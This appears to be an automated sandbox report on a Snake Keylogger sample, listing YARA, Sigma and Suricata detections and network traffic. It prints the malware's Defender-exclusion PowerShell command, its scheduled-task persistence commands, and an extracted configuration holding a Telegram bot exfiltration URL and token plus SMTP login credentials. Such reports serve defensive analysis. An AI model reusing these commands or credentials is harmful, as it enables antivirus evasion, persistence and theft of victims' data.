0.2.file.exe.46a75e0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xdeb7e:$a1: get_encryptedPassword 0xff79e:$a1: get_encryptedPassword 0x1201be:$a1: get_encryptedPassword 0xdee6a:$a2: get_encryptedUsername 0xffa8a:$a2: get_encryptedUsername 0x1204aa:$a2: get_encryptedUsername 0xde98a:$a3: get_timePasswordChanged 0xff5aa:$a3: get_timePasswordChanged 0x11ffca:$a3: get_timePasswordChanged 0xdea85:$a4: get_passwordField 0xff6a5:$a4: get_passwordField 0x1200c5:$a4: get_passwordField 0xdeb94:$a5: set_encryptedPassword 0xff7b4:$a5: set_encryptedPassword 0x1201d4:$a5: set_encryptedPassword 0xe0202:$a7: get_logins 0x100e22:$a7: get_logins 0x121842:$a7: get_logins 0xe0165:$a10: KeyLoggerEventArgs 0x100d85:$a10: KeyLoggerEventArgs 0x1217a5:$a10: KeyLoggerEventArgs
0.2.file.exe.46a75e0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xdf757:$s1: UnHook 0x100377:$s1: UnHook 0x120d97:$s1: UnHook 0xdf75e:$s2: SetHook 0x10037e:$s2: SetHook 0x120d9e:$s2: SetHook 0xdf766:$s3: CallNextHook 0x100386:$s3: CallNextHook 0x120da6:$s3: CallNextHook 0xdf773:$s4: _hook 0x100393:$s4: _hook 0x120db3:$s4: _hook
0.2.file.exe.46a75e0.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xe3c94:$x1: $%SMTPDV$ 0x1048b4:$x1: $%SMTPDV$ 0x1252d4:$x1: $%SMTPDV$ 0xe2598:$x2: $#TheHashHere%& 0x1031b8:$x2: $#TheHashHere%& 0x123bd8:$x2: $#TheHashHere%& 0xe3c3c:$x3: %FTPDV$ 0x10485c:$x3: %FTPDV$ 0x12527c:$x3: %FTPDV$ 0xe2538:$x4: $%TelegramDv$ 0x103158:$x4: $%TelegramDv$ 0x123b78:$x4: $%TelegramDv$ 0xdfdd0:$x5: KeyLoggerEventArgs 0xe0165:$x5: KeyLoggerEventArgs 0x1009f0:$x5: KeyLoggerEventArgs 0x100d85:$x5: KeyLoggerEventArgs 0x121410:$x5: KeyLoggerEventArgs 0x1217a5:$x5: KeyLoggerEventArgs 0xe3c60:$m2: Clipboard Logs ID 0xe3e94:$m2: Screenshot Logs ID 0xe3fa4:$m2: keystroke Logs ID
0.2.file.exe.470c600.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.470c600.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.file.exe.470c600.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.file.exe.470c600.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x79b5e:$a1: get_encryptedPassword 0x9a77e:$a1: get_encryptedPassword 0xbb19e:$a1: get_encryptedPassword 0x79e4a:$a2: get_encryptedUsername 0x9aa6a:$a2: get_encryptedUsername 0xbb48a:$a2: get_encryptedUsername 0x7996a:$a3: get_timePasswordChanged 0x9a58a:$a3: get_timePasswordChanged 0xbafaa:$a3: get_timePasswordChanged 0x79a65:$a4: get_passwordField 0x9a685:$a4: get_passwordField 0xbb0a5:$a4: get_passwordField 0x79b74:$a5: set_encryptedPassword 0x9a794:$a5: set_encryptedPassword 0xbb1b4:$a5: set_encryptedPassword 0x7b1e2:$a7: get_logins 0x9be02:$a7: get_logins 0xbc822:$a7: get_logins 0x7b145:$a10: KeyLoggerEventArgs 0x9bd65:$a10: KeyLoggerEventArgs 0xbc785:$a10: KeyLoggerEventArgs
0.2.file.exe.470c600.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x81632:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xa2252:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc2c72:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x80864:$a3: \Google\Chrome\User Data\Default\Login Data 0xa1484:$a3: \Google\Chrome\User Data\Default\Login Data 0xc1ea4:$a3: \Google\Chrome\User Data\Default\Login Data 0x80c97:$a4: \Orbitum\User Data\Default\Login Data 0xa18b7:$a4: \Orbitum\User Data\Default\Login Data 0xc22d7:$a4: \Orbitum\User Data\Default\Login Data 0x81cd6:$a5: \Kometa\User Data\Default\Login Data 0xa28f6:$a5: \Kometa\User Data\Default\Login Data 0xc3316:$a5: \Kometa\User Data\Default\Login Data
0.2.file.exe.470c600.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x7a737:$s1: UnHook 0x9b357:$s1: UnHook 0xbbd77:$s1: UnHook 0x7a73e:$s2: SetHook 0x9b35e:$s2: SetHook 0xbbd7e:$s2: SetHook 0x7a746:$s3: CallNextHook 0x9b366:$s3: CallNextHook 0xbbd86:$s3: CallNextHook 0x7a753:$s4: _hook 0x9b373:$s4: _hook 0xbbd93:$s4: _hook
0.2.file.exe.470c600.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x7ec74:$x1: $%SMTPDV$ 0x9f894:$x1: $%SMTPDV$ 0xc02b4:$x1: $%SMTPDV$ 0x7d578:$x2: $#TheHashHere%& 0x9e198:$x2: $#TheHashHere%& 0xbebb8:$x2: $#TheHashHere%& 0x7ec1c:$x3: %FTPDV$ 0x9f83c:$x3: %FTPDV$ 0xc025c:$x3: %FTPDV$ 0x7d518:$x4: $%TelegramDv$ 0x9e138:$x4: $%TelegramDv$ 0xbeb58:$x4: $%TelegramDv$ 0x7adb0:$x5: KeyLoggerEventArgs 0x7b145:$x5: KeyLoggerEventArgs 0x9b9d0:$x5: KeyLoggerEventArgs 0x9bd65:$x5: KeyLoggerEventArgs 0xbc3f0:$x5: KeyLoggerEventArgs 0xbc785:$x5: KeyLoggerEventArgs 0x7ec40:$m2: Clipboard Logs ID 0x7ee74:$m2: Screenshot Logs ID 0x7ef84:$m2: keystroke Logs ID
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b3e:$a1: get_encryptedPassword 0x14e2a:$a2: get_encryptedUsername 0x1494a:$a3: get_timePasswordChanged 0x14a45:$a4: get_passwordField 0x14b54:$a5: set_encryptedPassword 0x161c2:$a7: get_logins 0x16125:$a10: KeyLoggerEventArgs 0x15d90:$a11: KeyLoggerEventArgsEventHandler
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15717:$s1: UnHook 0x1571e:$s2: SetHook 0x15726:$s3: CallNextHook 0x15733:$s4: _hook
8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19c54:$x1: $%SMTPDV$ 0x18558:$x2: $#TheHashHere%& 0x19bfc:$x3: %FTPDV$ 0x184f8:$x4: $%TelegramDv$ 0x15d90:$x5: KeyLoggerEventArgs 0x16125:$x5: KeyLoggerEventArgs 0x19c20:$m2: Clipboard Logs ID 0x19e54:$m2: Screenshot Logs ID 0x19f64:$m2: keystroke Logs ID 0x1a23e:$m3: SnakePW 0x19e2c:$m4: \SnakeKeylogger\
8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b3e:$a1: get_encryptedPassword 0x3555e:$a1: get_encryptedPassword 0xbc16e:$a1: get_encryptedPassword 0x14e2a:$a2: get_encryptedUsername 0x3584a:$a2: get_encryptedUsername 0xbc45a:$a2: get_encryptedUsername 0x1494a:$a3: get_timePasswordChanged 0x3536a:$a3: get_timePasswordChanged 0xbbf7a:$a3: get_timePasswordChanged 0x14a45:$a4: get_passwordField 0x35465:$a4: get_passwordField 0xbc075:$a4: get_passwordField 0x14b54:$a5: set_encryptedPassword 0x35574:$a5: set_encryptedPassword 0xbc184:$a5: set_encryptedPassword 0x161c2:$a7: get_logins 0x36be2:$a7: get_logins 0xbd7f2:$a7: get_logins 0x16125:$a10: KeyLoggerEventArgs 0x36b45:$a10: KeyLoggerEventArgs 0xbd755:$a10: KeyLoggerEventArgs
8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15717:$s1: UnHook 0x36137:$s1: UnHook 0xbcd47:$s1: UnHook 0x1571e:$s2: SetHook 0x3613e:$s2: SetHook 0xbcd4e:$s2: SetHook 0x15726:$s3: CallNextHook 0x36146:$s3: CallNextHook 0xbcd56:$s3: CallNextHook 0x15733:$s4: _hook 0x36153:$s4: _hook 0xbcd63:$s4: _hook
8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19c54:$x1: $%SMTPDV$ 0x3a674:$x1: $%SMTPDV$ 0xc1284:$x1: $%SMTPDV$ 0x18558:$x2: $#TheHashHere%& 0x38f78:$x2: $#TheHashHere%& 0xbfb88:$x2: $#TheHashHere%& 0x19bfc:$x3: %FTPDV$ 0x3a61c:$x3: %FTPDV$ 0xc122c:$x3: %FTPDV$ 0x184f8:$x4: $%TelegramDv$ 0x38f18:$x4: $%TelegramDv$ 0xbfb28:$x4: $%TelegramDv$ 0x15d90:$x5: KeyLoggerEventArgs 0x16125:$x5: KeyLoggerEventArgs 0x367b0:$x5: KeyLoggerEventArgs 0x36b45:$x5: KeyLoggerEventArgs 0xbd3c0:$x5: KeyLoggerEventArgs 0xbd755:$x5: KeyLoggerEventArgs 0x19c20:$m2: Clipboard Logs ID 0x19e54:$m2: Screenshot Logs ID 0x19f64:$m2: keystroke Logs ID
Click to see the 52 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6784, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe", ProcessId: 6036, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmpAE14.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmpAE14.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe, ParentImage: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe, ParentProcessId: 7236, ParentProcessName: NPadpxkCGKGoat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmpAE14.tmp", ProcessId: 7328, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6784, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp", ProcessId: 5544, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6784, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe", ProcessId: 6036, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6784, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp", ProcessId: 5544, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:23:57.934299+0100	2803305	3	Unknown Traffic	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-02T20:24:01.934560+0100	2803305	3	Unknown Traffic	192.168.2.4	49748	188.114.96.3	443	TCP
2025-01-02T20:24:02.644950+0100	2803305	3	Unknown Traffic	192.168.2.4	49750	188.114.96.3	443	TCP
2025-01-02T20:24:03.991040+0100	2803305	3	Unknown Traffic	192.168.2.4	49754	188.114.96.3	443	TCP
2025-01-02T20:24:05.350440+0100	2803305	3	Unknown Traffic	192.168.2.4	49758	188.114.96.3	443	TCP
2025-01-02T20:24:06.760607+0100	2803305	3	Unknown Traffic	192.168.2.4	49761	188.114.96.3	443	TCP
2025-01-02T20:24:08.090192+0100	2803305	3	Unknown Traffic	192.168.2.4	49763	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:23:56.217464+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	132.226.247.73	80	TCP
2025-01-02T20:23:57.358081+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	132.226.247.73	80	TCP
2025-01-02T20:23:58.733919+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	132.226.247.73	80	TCP
2025-01-02T20:24:00.123735+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49743	132.226.247.73	80	TCP
2025-01-02T20:24:01.123756+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49745	132.226.247.73	80	TCP
2025-01-02T20:24:02.092488+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49745	132.226.247.73	80	TCP
2025-01-02T20:24:03.405028+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49752	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8095376190:AAGkuX6q297ioTZKrXInGOZiyZCFoUcQAQI/sendMessage?chat_id=1969833297", "Username": "oanhnth@dap.vn", "Password": "KhAnh110886", "Host": "mail.dap.vn", "Port": "587", "Token": "8095376190:AAGkuX6q297ioTZKrXInGOZiyZCFoUcQAQI", "Chat_id": "1969833297", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe

ReversingLabs: Detection: 71%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.0

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_02B1C1BC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_02B1C19C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_02B1DC88
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 0AA0A24Bh	0_2_0AA0A65E
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	8_2_04C8C1BC
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	8_2_04C8DC88
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 4x nop then jmp 09B195A3h	8_2_09B19932
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 4x nop then jmp 09B195A3h	8_2_09B19996

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.46a75e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49743 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49752 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

